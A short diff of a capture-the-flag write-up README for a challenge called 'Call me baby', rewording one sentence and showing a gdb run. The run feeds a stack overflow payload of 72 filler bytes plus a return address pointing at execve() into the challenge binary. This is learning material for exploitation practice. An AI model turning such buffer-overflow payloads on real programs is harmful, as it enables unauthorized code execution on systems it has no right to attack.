geoffrey-diederichs/CTF_SSI_2024/02_Call_me_baby/README.md

 End of assembler dump.
 ```

 We can see that the instruction is being called at the address `0x00000000004011c4`.
-Let's try a payload : 72 characters to overwrite local_48 and the rbp, followed by the pointer to the execve() function.
+Let's try a payload : 72 characters to write over local_48 and the rbp, followed by the pointer to the execve() function.

 ```gdb
 (gdb) run <<< $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*72+b"\xb0\x11\x40\x00"+b"\x00"*4)')